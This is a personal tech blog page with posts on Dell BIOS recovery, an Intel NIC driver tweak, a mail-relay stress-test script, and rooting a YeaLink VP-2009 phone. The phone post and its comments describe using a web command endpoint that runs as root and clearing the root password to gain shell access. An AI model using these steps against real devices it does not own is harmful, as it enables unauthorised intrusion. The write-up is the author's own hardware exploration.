Updates from January, 2019 Toggle Comment Threads | Keyboard Shortcuts

  • duncanbowring 10:58 on January 12, 2019 Permalink | Reply  

    Dell R210 II BIOS Update Bricked – Fixed 

    Broke my old Dell R210 II doing a BIOS update. Managed to fix it by flashing the chip directly.

    In the case of the R210 II, I used:

    CH341A USB Programmer (https://www.amazon.com/gp/product/B01I1EU9LG)

    SOIC8 Chip Clip (https://www.amazon.com/gp/product/B00V9QNAC4)

    CH341A Programmer software (free)

    The toughest part was finding the 8MB flash binary within the Dell downloads.

    The flash image start header is: FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5AA5F00F .. searching for that [using a hex editor] and then selecting 0x800000 (8MB) length (which is the end of file here). I dumped it to a new file, then flashed that new .bin to the BIOS. First I tried to use the OEM EXE, but it was a weird length. I ended up extracting the installer and using the file that was in the payload directory.

    Result! Back in business.

  • duncanbowring 17:39 on January 17, 2013 Permalink | Reply
    Tags: 82579V, Asus Rampage, Intel 82579V 2008 R2, Rampage IV Extreme, Windows server on X79   

    How To: Intel 82579V Gigabit Network Connection – Windows Server 2008 R2 

    Clearly Intel doesn’t want us to install server OS onto desktop motherboards nowadays.

    Look at your driver CD. Navigate to the PRO1000 folder; depending on whether you have 32bit or 64bit OS, you will then want either Win32 or Winx64 (not Win64 which is for Itanium).
    The choice for the next folder will depend on your OS; NDIS5x is Server2003 or XP, NDIS61 is Server2008 or Vista, NDIS62 is Server2008R2 or 7, I presume NDIS63 is for Windows 8, Server 2012.

    Copy the correct folder to your desktop.

    In either case once you have chosen the correct folder you need to find the .inf starting e1c ; so for Server 2008 R2 64bit it will be called e1c62x64.inf. Ensure you are doing this on the copy that now exists on your desktop.

    Open the file in notepad;

    ; e1c62x64.INF (Intel 64-bit extension Platform Only,
    ; Windows 7 64-bit extension and Windows Server 2008 R2 64-bit extension)
    ; Intel(R) Gigabit Network connections
    Signature = "$Windows NT$"
    Class = Net
    ClassGUID = {4d36e972-e325-11ce-bfc1-08002be10318}
    Provider = %Intel%
    CatalogFile = e1c62x64.cat
    DriverVer = 06/21/2012,
    %Intel% = Intel, NTamd64.6.1, NTamd64.6.1.1, NTamd64.6.2
    ExcludeFromSelect = \ 
    ; DisplayName Section DeviceID
    ; ----------- ------- --------
    %E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502
    %E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_00011179
    %E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_00021179
    %E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_80001025
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00011179
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00021179
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_80001025
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_04911025
    ; DisplayName Section DeviceID
    ; ----------- ------- --------
    %E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502
    %E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_00011179
    %E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_00021179
    %E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_80001025
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00011179
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00021179
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_80001025
    %E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_04911025

    Open the file in notepad;

    If you look in [ControlFlags], you see that there are two device IDs listed. DEV_1502 and DEV_1503.
    If you go back to the new computer you built (with no NIC driver installed 🙂 ), in Device Manager, you should see “Ethernet Adapter” listed as an unknown device. Go into the Properties of that, then Details, Hardware Ids. Now, you see that the device should be DEV_1503. Great.

    Go back to the notepad file you have open, you can see that under the second section within [Intel] you don’t have anything listed for DEV_1503 under [Intel.NTamd64.61]. Ironically, every other section has Server 2008 R2 provided for. Sneaky Intel, sneaky.

    Anyway, copy and paste the two lines that provide for DEV_1503 in the [Intel.NTamd64.6.1.1] section to the new section, like above. Save the file.

    Go back to the other computer that still has device manager open (it might be the same computer..), click Driver -> Update Driver, then manually select the desktop location of your NDIS62 directory you copied and then edited.

    Driver should install successfully. Hit me up if your mileage varies.

  • duncanbowring 15:58 on January 9, 2013 Permalink | Reply
    Tags: generate test emails, mta stress test, , smtp relay test, stress test smtp   

    SMTP Relay Stress Test Script 

    The problem

    So.. I had an issue where I had to stress test a new MTA I was deploying. Generating load so I can tweak the config was key.. here’s a handy way to do it.


    27% chance of sending a 37,597 byte message with an attachment
    17% chance of sending a 3,075 byte message
    16% chance of sending a 7,108 byte message
    10% chance of sending a 14,743 byte message
    6% chance of sending a 547 byte message
    6% chance of sending a 60,969 byte message with an attachment
    4% chance of sending a 124,167 byte message with an attachment
    3% chance of sending a 85,993 byte message with an attachment
    2% chance of sending a 171,358 byte message with an attachment
    2% chance of sending a 221,826 byte message with an attachment
    1% chance of sending a 274,007 byte message with an attachment
    1% chance of sending a 313,479 byte message with an attachment
    1% chance of sending a 416,983 byte message with an attachment
    1% chance of sending a 550,839 byte message with an attachment
    1% chance of sending a 761,659 byte message with an attachment
    1% chance of sending a 1,214,991 byte message with an attachment
    1% chance of sending a 5,505,014 byte message with an attachment

    Generate Test Files:

    dd if=/dev/urandom of=4031 bs=1 count=4031
    dd if=/dev/urandom of=6281 bs=1 count=6281
    dd if=/dev/urandom of=18123 bs=1 count=18123
    dd if=/dev/urandom of=230 bs=1 count=230
    dd if=/dev/urandom of=24987.doc bs=1 count=24987
    dd if=/dev/urandom of=80234.doc bs=1 count=80234
    dd if=/dev/urandom of=112167.doc bs=1 count=112167
    dd if=/dev/urandom of=89941.doc bs=1 count=89941
    dd if=/dev/urandom of=149344.doc bs=1 count=149344
    dd if=/dev/urandom of=221826.doc bs=1 count=221826
    dd if=/dev/urandom of=274007.doc bs=1 count=274007
    dd if=/dev/urandom of=313479.doc bs=1 count=313479
    dd if=/dev/urandom of=416983.doc bs=1 count=416983
    dd if=/dev/urandom of=550839.doc bs=1 count=550839
    dd if=/dev/urandom of=761659.doc bs=1 count=761659
    dd if=/dev/urandom of=1214991.doc bs=1 count=1214991
    dd if=/dev/urandom of=5505014.doc bs=1 count=5505014

    The Script to Stress Test your Relay:


    if [ -z “$1” ] ; then
    echo “Usage: $0 messagecount”
    exit 1

    1. $Absolute path to mutt (mail agent)


    1. destination email addresses



    while [ “$COUNTER” -lt $1 ]
    RN=`echo $(( RANDOM % 100 + 1))`
    if [ $RN -ge 1 -a $RN -le 27 ] ; then
    $MUTT -a 24987.doc — $RECIPIENTS < “.”
    elif [ $RN -ge 28 -a $RN -le 44 ] ; then
    $MUTT -i 4031 $RECIPIENTS < “.”
    elif [ $RN -ge 45 -a $RN -le 60 ] ; then
    $MUTT -i 6281 $RECIPIENTS < “.”
    elif [ $RN -ge 61 -a $RN -le 70 ] ; then
    $MUTT -i 18123 $RECIPIENTS < “.”
    elif [ $RN -ge 71 -a $RN -le 76 ] ; then
    $MUTT -i 230 $RECIPIENTS < “.”
    elif [ $RN -ge 77 -a $RN -le 82 ] ; then
    $MUTT -a 80234.doc — $RECIPIENTS < “.”
    elif [ $RN -ge 83 -a $RN -le 86 ] ; then
    $MUTT -a 112167.doc — $RECIPIENTS < “.”
    elif [ $RN -ge 87 -a $RN -le 89 ] ; then
    $MUTT -a 89941.doc — $RECIPIENTS < “.”
    elif [ $RN -ge 90 -a $RN -le 91 ] ; then
    $MUTT -a 149344.doc — $RECIPIENTS < “.”
    elif [ $RN -ge 92 -a $RN -le 93 ] ; then
    $MUTT -a 221826.doc — $RECIPIENTS < “.”
    elif [ $RN -eq 94 ] ; then
    $MUTT -a 274007.doc — $RECIPIENTS < “.”
    elif [ $RN -eq 95 ] ; then
    $MUTT -a 313479.doc — $RECIPIENTS < “.”
    elif [ $RN -eq 96 ] ; then
    $MUTT -a 416983.doc — $RECIPIENTS < “.”
    elif [ $RN -eq 97 ] ; then
    $MUTT -a 550839.doc — $RECIPIENTS < “.”
    elif [ $RN -eq 98 ] ; then
    $MUTT -a 761659.doc — $RECIPIENTS < “.”
    elif [ $RN -eq 99 ] ; then
    $MUTT -a 1214991.doc — $RECIPIENTS < “.”
    elif [ $RN -eq 100 ] ; then
    $MUTT -a 5505014.doc — $RECIPIENTS < “.”

    1. add counter

    COUNTER=`expr $COUNTER + 1`


  • duncanbowring 03:57 on April 23, 2012 Permalink | Reply
    Tags: Rooted, VOIP, VP-2009, YeaLink   

    YeaLink VP-2009 VOIP/Video Phone – r00ted, here’s how.. 

    Awesome phone. Not so awesome code. It took me the best part of 6 hours, but I rooted the bitch. Guide to come!

    Now, I just need to see what security risk this poses to me since I now use these phones professionally. Be careful if you use these in your office! At least it’s not so easy to change the actual phone software. It’s a compiled ARM binary. Pity, would have been nice to write custom modules for it. I think it uses some strange XML interface to display content, might be a way to make that display web content of your own choice.


    Rough guide:


    <title>syntax error</title>
    Unkonw GET type : useage ?[page/download/command]=xxx

    Oh look, I can download any file from the phone.

    Hmm.. command? What is command? Well, we can grab the syslog and see what goes on in there..

    Mar 29 10:42:47 mini_httpd[772]: mini_httpd.c(1466):path:/cgi-bin/cgiServer.exx,query:command=msgSendMessage(%22app_vpPhone%22,%220xa8004%22,%220%22,%220%22)

    Interesting! Alright, so I dig through their web code and I find:

     function _SendMessage(thread, uMsg, wParam, lParam)


    return “msgSendMessage(\”” + thread + “\”,\”” + uMsg + “\”,\”” + wParam +”\”,\”” + lParam + “\”)”;


    I test that via URL, and it works. I think. No errors.

    What else do I see here..

    function _getFreeSpace(strpath)
            return "getFreeSpace(\"" + strpath + "\")";

    Aha, this works too. With any path, via URL.

    However, here’s the money shot right here.. interesting command:

    function _system(cmd)
            return "system(\"" + cmd + "\")";

    I see they make calls to it internally:

    function doReboot()
    //var formInput = document.formInput;
    if(xmlHttpGet(_SendMessage(“app_vpPhone”, “0xa8004”, 0, 0)) == “1”)
    alert(“Talking, Please save config later.”);
    if(confirm(” Do you want to reboot device?”))
    jsShowPageStatus(“main-content”,”Rebooting , please wait …”, “server-status”);
    xmlHttpPostAsyn(_system(“reboot >/dev/null 2>&1”), responseXmlHttp);

    So, let’s try reboot.. I execute the reboot command via the browser. Boom, it reboots.

    After hours of screwing around and banging out recursive ls, df, contents of files, touching new files.. I figure out that they obfuscate user permissions for /etc/


    1 -rwxr-xr-x    1 1011     1002          601 May 13  2011 passwd

    0 -rwxr-xr-x    1 1011     1002           31 May 13  2011 issue.net

    0 -rwxr-xr-x    1 1011     1002          452 May 13  2011 nsswitch.conf

    0 -rwxr-xr-x    1 1011     1002          421 May 13  2011 inputrc

    2 drwxr-xr-x    1 1011     1002         2048 May 13  2011 dhcpc

    0 -rwxr-xr-x    1 1011     1002           26 May 13  2011 host.conf

    3 -rwxr-xr-x    1 1011     1002         2921 May 13  2011 inetd.conf

    Still doesn’t explain why I cannot rm files I’ve created in /tmp or append with echo. I can only create with echo or touch!

    Numerous attempts to add a user doesn’t work. The commands just don’t exist.
    I look at the files I create with touch and oh dear oh dear, they’re created by root. No chroot ! Or even running as an unprivileged user!

    I chown passwd to root:root and then I run passwd –d to remove password. I overwrite MOTD prior to this as a test, hence the ‘test’.

    BAM, I’m in.

    Footnote: Now I’ve firewalled this interface off from the rest of the users on my network. Don’t want anyone snooping in on private phone stuff!

    • gerod006 14:03 on June 19, 2012 Permalink | Reply

      How can i download files in tmp ????

      • duncanbowring 17:58 on June 19, 2012 Permalink | Reply

        Same method, just include the path in your download URL. /tmp/file. You have to make sure it’s readable, so use ls to check the perms. Interestingly, everything the webserver does is as root, so you can do anything.

    • gerod006 20:36 on June 19, 2012 Permalink | Reply

      are there some way to download all tmp folder, I dont know each file??? I want the an xml file… Thnks

      • duncanbowring 20:47 on June 19, 2012 Permalink | Reply

        You’d have to write a script to do it. Look at my instruction on command execution, you can run ls to get a directory listing. From there you can tell what you need.

        If you are handy with scripting you could automate the process.

        However, if you remove the root password, you can ssh in and then use scp to grab what you need from there like standard Linux.

    • gerod006 20:51 on June 19, 2012 Permalink | Reply

      ok i will try it

    • gerod006 08:38 on June 21, 2012 Permalink | Reply

      Hi, i downloaded files that i need, i found the path: http://admin:admin@ and other files, i couldn’t execut script, I dont know how execute it, ¿ http://admin:admin@ ? is it ok.??
      I need modify the files and upload. or replace them.

      • duncanbowring 08:42 on June 21, 2012 Permalink | Reply

        It might be easier to wipe out the root password and do it all via putty/ssh.

        What are you trying to modify?

        • gerod006 08:55 on June 21, 2012 Permalink

          i will register a line automatically, with a aplication i will generate the file .cfg and replace it, i did it whit other phones, but with them i can use telnet.
          I didnt like modify other things in the phone..

        • duncanbowring 16:47 on June 21, 2012 Permalink

          Of course, that’s a good idea. You could wipe out root then add a new user to remotely administrate them via ssh. Central configuration would make a great addition to this tutorial. 🙂

        • duncanbowring 18:19 on July 22, 2012 Permalink

          hey how did you get on with things?

    • gerod006 07:25 on July 23, 2012 Permalink | Reply

      I did it with auto-provisioning, i created configuration file, in tftpboot folder (Linux).
      And when reboot the Yealink, it reads the file.

    • Sam 09:49 on November 6, 2012 Permalink | Reply

      Hello there,
      I am far from a programer, but like to try-
      I was wondering if its running linux would it allow you to configure the phone to hit a relay on an action?

Compose new post
Next post/Next comment
Previous post/Previous comment
Show/Hide comments
Go to top
Go to login
Show/Hide help
shift + esc
%d bloggers like this: